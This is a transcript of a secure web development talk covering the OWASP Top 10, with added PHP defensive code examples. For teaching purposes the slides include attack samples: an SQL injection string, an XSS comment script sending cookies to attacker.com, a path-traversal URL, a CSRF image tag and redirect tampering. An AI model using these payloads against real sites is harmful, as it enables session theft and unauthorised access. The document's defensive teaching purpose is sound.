Transcript

25/11/2014

Developing Secure Web Apps

Mark Garratt

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

Introduction

• Was: UH Student - Graduated 2012
• Now: Full Stack Developer at Cyber-Duck
• Things I do:
  – Programmer: PHP, MySQL, Node.js (JavaScript), MongoDB, HTML/CSS etc.
  – System Administrator: Linux server management
  – Security Tester: Reviewing and testing web apps
• Things I use:
  – TDD / BDD
  – Continuous Integration (Jenkins/Travis)
  – Vagrant + Docker


Knowledge Transfer Partnerships

“A relationship formed between a company and an academic institution ('Knowledge Base' partner), which facilitates the transfer of knowledge, technology and skills to which the company partner currently has no access. Each partnership employs one or more recently qualified people (known as an Associate) to work in a company on a project of strategic importance to the business, whilst also being supervised by the Knowledge Base Partner. Projects vary in length between 12 and 36 months. The Associates are either postgraduate researchers, university graduates, or individuals qualified to at least NVQ (Level 4) or equivalent.”

WHEN YOU GRADUATE APPLY FOR THESE


This talk…

• A bit about Cyber-Duck
• The development process
• Server security
• Application security
• Testing


About Cyber-Duck


Our Clients


The process

• Research
  – Determine all security considerations for the project
• User Experience
  – Follow best practices
• Art Direction
• Development
  – Design production environment
  – Secure coding
  – Continuous testing
• Marketing
• Support
  – Bug reports
  – More testing


Server Security

• Type of server
  – Cloud, dedicated, shared, in-house
• Server stack
  – Operating system
  – Language / Technology
  – Database / Caching
  – Scaling options
• Protection
  – Anti-virus & Anti-malware
  – Firewalls & IPS
  – Back ups
  – Others…


Server Management

• Most servers have similar configurations
• More clients = more traffic = more servers
• Need a way to keep all of them up to date
• We use Configuration Management software
• Several available: Ansible, Chef, Puppet, etc.


We use Puppet

• The master server holds the config for all servers
• Agent servers read their config every half an hour
• Patch once, everything updates
• Can be used with Vagrant for development


Application Security

• Starts in the research phase of a project
  – Evaluate possible points of attack
• UX designs the application with secure methods
• Security is most relevant during Development
  – Be aware of vulnerabilities
  – Follow safe practices
  – Test for missed vulnerabilities
• Post-launch, continue testing
  – Bugs may reveal vulnerabilities
  – Bug-fixes may create vulnerabilities


Staying aware of vulnerabilities

• Official lists and statistics – OWASP Top 10, CSA, etc.
• Mailing lists
• Industry news
• Blogs
• Social media – especially Twitter
• Common Vulnerability Scoring System (CVSS)
  – https://web.nvd.nist.gov/ - 3,365 vulnerabilities in the last 3 months


OWASP Top 10

A1 Injection
A2 Broken Authentication and Session Management
A3 Cross-Site Scripting (XSS)
A4 Insecure Direct Object References
A5 Security Misconfiguration
A6 Sensitive Data Exposure
A7 Missing Function Level Access Control
A8 Cross-Site Request Forgery (CSRF)
A9 Using Components with Known Vulnerabilities
A10 Unvalidated Redirects and Forwards


Injection

• Most common is SQL injection
• Applications are vulnerable when user input is not validated

Example:

<?php
$user = $_POST['user_id'];
$query = "SELECT * FROM users WHERE id LIKE '%$user%'";
$result = mysql_query($query);

If the attacker submits:

user_id = "' OR 1; #"

the query that reaches the database becomes:

"SELECT * FROM users WHERE id LIKE '%' OR 1; #%'"
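The same lookup written so that user input can never become SQL. This is an added example, not code from the talk or from Cyber-Duck; the DSN, credentials and the `users` table shape are assumptions, and the id format in the regular expression is a constructed rule for the example.

```php
<?php
// Added example (not from the talk): the slide's query with a PDO prepared
// statement. DSN and credentials are placeholders.
$pdo = new PDO(
    'mysql:host=localhost;dbname=app;charset=utf8mb4',
    'app_user',
    'PLACEHOLDER_PASSWORD',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
    ]
);

/**
 * Look up users by a partial id. The input travels to MySQL as a bound
 * parameter, so it is data and never part of the SQL text: the slide's
 * "' OR 1; #" payload becomes a LIKE pattern that matches no row.
 */
function findUsers(PDO $pdo, string $partialId): array
{
    // % and _ are LIKE wildcards; escape them with an explicit ESCAPE
    // character so a bare "%" cannot widen the match to the whole table.
    $pattern = '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $partialId) . '%';

    $stmt = $pdo->prepare("SELECT * FROM users WHERE id LIKE :pattern ESCAPE '!'");
    $stmt->execute([':pattern' => $pattern]);

    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Handler: validate the shape first (an id should look like an id), then query.
$input = $_POST['user_id'] ?? '';
if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $input)) {
    http_response_code(400);
    exit('Invalid user id');
}
var_dump(findUsers($pdo, $input));
```

Validation and parameterisation do different jobs: the regular expression rejects input that makes no sense for the field, and the prepared statement guarantees that whatever does get through is treated as a value. The `mysql_*` functions used on the slide were removed in PHP 7, so new code has to use PDO or mysqli in any case.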


http://xkcd.com/327/


Broken Authentication and Session Management

• Misconfiguration of authentication and session management

• Attackers use this to compromise passwords, keys, session tokens or other valuable data

Example: Session Hijacking

http://example.com/loggedin?sess_id=a1b2c3d4e5f6

If the victim emails this link, whoever receives it is logged in to the victim's account.
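Session settings that keep the id out of URLs like the one above, and regenerate it at login. This is an added example, not code from the talk or from Cyber-Duck; the function names and the session keys are assumptions, and the array form of `session_set_cookie_params()` needs PHP 7.3 or later.

```php
<?php
// Added example (not from the talk): PHP session hardening. Names assumed.

ini_set('session.use_only_cookies', '1'); // ignore any session id in the URL
ini_set('session.use_trans_sid', '0');    // never append the id to links/forms
ini_set('session.use_strict_mode', '1');  // refuse ids the server never issued

session_set_cookie_params([
    'lifetime' => 0,        // dropped when the browser closes
    'path'     => '/',
    'secure'   => true,     // only sent over HTTPS
    'httponly' => true,     // invisible to document.cookie
    'samesite' => 'Lax',
]);
session_start();

/** Call once the password check has succeeded. */
function establishSession(int $userId, string $role): void
{
    // A brand-new id after authentication means any id an attacker planted
    // or observed before login is worthless afterwards (session fixation).
    session_regenerate_id(true);
    $_SESSION['user_id']   = $userId;
    $_SESSION['role']      = $role;
    $_SESSION['issued_at'] = time();
}

/** Call on logout: invalidates the server-side session and the cookie. */
function destroySession(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 3600, $p['path'], $p['domain'],
              $p['secure'], $p['httponly']);
    session_destroy();
}
```

With `use_only_cookies` on, a `?sess_id=...` parameter is simply ignored, so a forwarded link logs nobody in; with `use_strict_mode` on, an id the server did not generate is rejected rather than silently adopted.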


Cross-Site Scripting (XSS)

• Occurs when un-validated user input is sent to the browser
• Allows an attacker to execute scripts in the victim's browser

Example: Comment forms

A comment is left:

<script type="text/javascript"> document.location = "http://attacker.com/post?cookie=" + document.cookie;</script>
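How the comment page should render that input. This is an added example, not code from the talk or from Cyber-Duck; the comment text is the slide's payload used as a constructed sample, the author value is constructed, and the helper name `e()` is an assumption.

```php
<?php
// Added example (not from the talk): output encoding for a comment page.

/** Encode an untrusted value for an HTML text or quoted-attribute context. */
function e(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Defence in depth, sent before any output: a CSP refuses inline scripts even
// if an encoding call is forgotten somewhere else on the site.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");

// Constructed samples: the slide's payload as the comment body, and an author
// name containing a quote to show the attribute context.
$comment = '<script type="text/javascript"> document.location = '
         . '"http://attacker.com/post?cookie=" + document.cookie;</script>';
$author  = 'O"Brien';

// Vulnerable: the markup is handed to the browser as-is and the script runs.
// echo "<div class=\"comment\" data-author=\"$author\">$comment</div>";

// Hardened: every untrusted value is encoded for the context it lands in.
echo '<div class="comment" data-author="' . e($author) . '">' . e($comment) . '</div>';
// The browser now displays the literal text "<script ...>" and never executes it.
```

Encode at output time, for the context (HTML body, attribute, URL, JavaScript) the value lands in; stripping tags on input is not a substitute. An `HttpOnly` session cookie is the other half of the defence against this particular payload, since `document.cookie` then cannot read it.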


Insecure Direct Object References

• Internal implementation details are revealed to the user, e.g. a file location or database key
• The reference is not properly protected, allowing an attacker to manipulate it

Example:

http://example.com/user_uploads/my_image.png
http://example.com/user_uploads/../../.htaccess
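Two ways to serve an upload without letting the request pick an arbitrary file. This is an added example, not code from the talk or from Cyber-Duck; the upload directory, the `uploads(id, owner_id, stored_name)` table, the database credentials and the function names are all assumptions.

```php
<?php
// Added example (not from the talk): safe handling of file references.
session_start();
$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app_user',
               'PLACEHOLDER_PASSWORD', [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);

const UPLOAD_DIR = '/var/www/app/user_uploads';   // assumed location

/**
 * Direct reference made safe: resolve the name inside the upload directory
 * and refuse anything that escapes it. realpath() collapses "..", symlinks
 * and repeated slashes, so a prefix check on its result is reliable; the
 * slide's "../../.htaccess" resolves outside UPLOAD_DIR and returns null.
 */
function resolveUploadPath(string $requested): ?string
{
    $base = realpath(UPLOAD_DIR);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false) {
        return null;                                   // no such file
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                   // escaped the directory
    }
    return $path;
}

/**
 * Indirect reference, the fix OWASP prefers: the client sends an opaque id,
 * the server looks up the real name AND checks that the file belongs to the
 * logged-in user. The client never sees or controls a filesystem path.
 */
function lookupUpload(PDO $pdo, int $uploadId, int $currentUserId): ?string
{
    $stmt = $pdo->prepare(
        'SELECT stored_name FROM uploads WHERE id = :id AND owner_id = :owner'
    );
    $stmt->execute([':id' => $uploadId, ':owner' => $currentUserId]);
    $name = $stmt->fetchColumn();
    return $name === false ? null : resolveUploadPath($name);
}

// Handler for /download?id=42
$id   = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);   // false/null if not an int
$path = ($id !== false && $id !== null && isset($_SESSION['user_id']))
      ? lookupUpload($pdo, $id, (int) $_SESSION['user_id'])
      : null;
if ($path === null) {
    http_response_code(404);                           // same answer for "missing" and "not yours"
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
readfile($path);
```

The ownership check in `lookupUpload()` is what turns a guessable key into a protected one: a valid id for someone else's file yields the same 404 as a nonexistent id, so the response leaks nothing about other users' objects.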


Security Misconfiguration

• Several programs are required to run a single web application
• Any one of these can have a vulnerability if misconfigured
• Secure settings should be defined, implemented, and maintained, as defaults are often insecure.
• Software should be kept up to date.


Sensitive Data Exposure

• Applications dealing with sensitive data must protect it
• Suitable encryption or hashing must be used effectively
• Data needs to be protected in transit and at rest

Example:

A website encrypts credit card data in the database using the database's built-in encryption mechanism. An injection vulnerability in the application allows the database to decrypt the data for the attacker. If the application had encrypted the data before storing it, the injection attack would only discover encrypted data.
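What "encrypting before storing" looks like in the application layer. This is an added example, not code from the talk or from Cyber-Duck; the environment variable name, the `cards` table, the database credentials and the function names are assumptions, the card number is a constructed test value, and AEAD ciphers in `openssl_encrypt()` need PHP 7.1 or later.

```php
<?php
// Added example (not from the talk): field encryption in the application.
// The key lives in the process environment, not in the database, so a SQL
// injection that dumps the table obtains ciphertext it cannot decrypt.

function loadKey(): string
{
    $hex = getenv('CARD_DATA_KEY');               // assumed: 64 hex chars set by the deployment
    if ($hex === false || strlen($hex) !== 64 || !ctype_xdigit($hex)) {
        throw new RuntimeException('CARD_DATA_KEY missing or not 32 bytes of hex');
    }
    return hex2bin($hex);
}

/** Returns base64(iv . tag . ciphertext). AES-256-GCM authenticates as well as encrypts. */
function encryptField(string $plaintext, string $key): string
{
    $iv  = random_bytes(12);                      // fresh nonce for every value
    $tag = '';
    $ct  = openssl_encrypt($plaintext, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag);
    if ($ct === false) {
        throw new RuntimeException('encryption failed');
    }
    return base64_encode($iv . $tag . $ct);
}

/** Returns null if the blob is malformed or has been tampered with. */
function decryptField(string $blob, string $key): ?string
{
    $raw = base64_decode($blob, true);
    if ($raw === false || strlen($raw) < 12 + 16) {
        return null;
    }
    $iv  = substr($raw, 0, 12);
    $tag = substr($raw, 12, 16);
    $ct  = substr($raw, 28);
    $pt  = openssl_decrypt($ct, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag);
    return $pt === false ? null : $pt;            // false on bad tag => tampering or wrong key
}

// Storing: the INSERT only ever sees ciphertext. Credentials are placeholders.
$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app_user',
               'PLACEHOLDER_PASSWORD', [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$key  = loadKey();
$stmt = $pdo->prepare('INSERT INTO cards (user_id, pan_enc) VALUES (:u, :c)');
$stmt->execute([':u' => 42, ':c' => encryptField('4111111111111111', $key)]);   // constructed test PAN

// Reading back happens only in application code that holds the key.
$enc = $pdo->query('SELECT pan_enc FROM cards WHERE user_id = 42')->fetchColumn();
$pan = decryptField($enc, $key);
```

The contrast with the slide's scenario is where the key is: a database-side function such as `AES_DECRYPT()` can be called by any query the attacker injects, whereas the key above never reaches the database at all.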


Missing Function Level Access Control

• When a user logs in, their access level is verified; this should also be verified on each subsequent request.

Example: A website has user and admin areas. An attacker logs in as a user and is redirected to:

http://example.com/user/dashboard

They then go to the following URL with full access:

http://example.com/admin
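A per-request role check that closes the gap described above. This is an added example, not code from the talk or from Cyber-Duck; the role names, the path prefixes and the function name are assumptions.

```php
<?php
// Added example (not from the talk): enforce the access level on every request.

const ROLE_RANK = ['anonymous' => 0, 'user' => 1, 'admin' => 2];

/**
 * Abort the request unless the current session holds at least $required.
 * The role comes from the server-side session (set at login from the DB),
 * never from a cookie value, hidden field or URL the client can edit.
 */
function requireRole(string $required): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (!isset(ROLE_RANK[$required])) {
        throw new LogicException("unknown role: $required");
    }
    $role = $_SESSION['role'] ?? 'anonymous';
    if ((ROLE_RANK[$role] ?? 0) < ROLE_RANK[$required]) {
        if ($role === 'anonymous') {
            header('Location: /login', true, 303);    // not logged in at all
        } else {
            http_response_code(403);                  // logged in, wrong level
        }
        exit;
    }
}

// Front controller: map URL prefixes to the role they require, so a page
// cannot be reached just by typing its URL. Anything under /admin needs
// "admin"; logging in as a user and visiting /admin now yields 403.
$path  = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH) ?? '/';
$rules = [
    '/admin' => 'admin',
    '/user'  => 'user',
];
foreach ($rules as $prefix => $role) {
    if ($path === $prefix || strpos($path, $prefix . '/') === 0) {
        requireRole($role);
    }
}
// ... dispatch $path to the page that renders it ...
```

Hiding the admin link from the navigation is not a control; the check has to run where the request is served. Within the user area the same idea applies per object: a request for someone else's record must be refused even though the caller has the "user" role.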


Cross-Site Request Forgery (CSRF)

• An attacker tricks a user into sending data from one website to another.

Example: A user is logged in to their bank account, which uses a session cookie. The user then visits an attacker's website containing the following code:

<img src="http://bank.com/transfer?to=12345&amount=100" />

The cookie is sent so bank.com thinks the user made the request.
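A synchroniser token for the transfer form, so the cookie alone is not enough to authorise the request. This is an added example, not code from the talk or from Cyber-Duck; the form field names, the URL `/transfer` and the function names are assumptions.

```php
<?php
// Added example (not from the talk): CSRF protection for a state-changing form.
// A cross-site <img> or auto-submitted form carries the cookie but cannot read
// the token from the victim's page, so the forged request fails the check.

session_start();

function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrfValid(?string $submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);   // constant-time compare
}

/** The form carries the token as a hidden field. */
function renderTransferForm(): string
{
    $token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/transfer">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="to"><input name="amount"><button>Send</button></form>';
}

// GET /transfer shows the form and changes nothing, so the slide's
// <img src="http://bank.com/transfer?..."> can only ever fetch this page.
if ($_SERVER['REQUEST_METHOD'] === 'GET') {
    echo renderTransferForm();
    exit;
}

// POST /transfer: the token must match the one in this user's session.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    header('Allow: GET, POST');
    exit;
}
if (!csrfValid($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('CSRF token invalid');
}
// ... perform the transfer for $_SESSION['user_id'] using $_POST['to'] and $_POST['amount'] ...
```

Two properties do the work: state changes are only accepted on POST, and the POST must carry a secret the attacker's page cannot read. Setting the session cookie with `SameSite=Lax` or `Strict` adds a second layer, since the browser then withholds the cookie from cross-site requests.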


Using Components with Known Vulnerabilities

• Modern web applications are built with libraries, frameworks, plugins, etc. Vulnerabilities can exist in 3rd party code
• Not updating these libraries may introduce vulnerabilities
• Dependency managers (composer, npm, etc.) can help with this, but updates still need to be tested


Unvalidated Redirects and Forwards

• Sometimes it’s necessary to redirect a user from one application page to another. These redirects need to be validated to avoid misuse.

Example:

http://example.com/login?redirect=dashboard

Is changed by an attacker to

http://example.com/login?redirect=admin
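Validating the redirect with an allow-list rather than trusting the parameter. This is an added example, not code from the talk or from Cyber-Duck; the target names and paths and the function names are assumptions.

```php
<?php
// Added example (not from the talk): safe post-login redirect.

// Preferred: the parameter is a key into a server-side table, never a path.
const REDIRECT_TARGETS = [
    'dashboard' => '/user/dashboard',
    'profile'   => '/user/profile',
    'orders'    => '/user/orders',
];

function redirectTarget(?string $requested): string
{
    // Unknown keys ("admin"), absolute URLs and protocol-relative URLs all
    // fall through to the default.
    return REDIRECT_TARGETS[$requested ?? ''] ?? REDIRECT_TARGETS['dashboard'];
}

/**
 * Fallback when a free-form path must be accepted: allow only a single
 * leading slash and no scheme, host or backslash (browsers treat "/\host"
 * like "//host"), so the destination stays on this site.
 */
function isLocalPath(string $url): bool
{
    if ($url === '' || $url[0] !== '/' || (isset($url[1]) && $url[1] === '/')) {
        return false;
    }
    if (strpos($url, '\\') !== false) {
        return false;
    }
    $parts = parse_url($url);
    return $parts !== false && !isset($parts['scheme']) && !isset($parts['host']);
}

// After a successful login:
header('Location: ' . redirectTarget($_GET['redirect'] ?? null), true, 303);
exit;
```

Note that the slide's `redirect=admin` case is only harmful if the admin page trusts the redirect as proof of access; the redirect check keeps users on intended pages, and the admin page still has to enforce its own access control on every request.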


Questions?

Contact

Mark [email protected]

@MGarratt88
http://www.cyber-duck.co.uk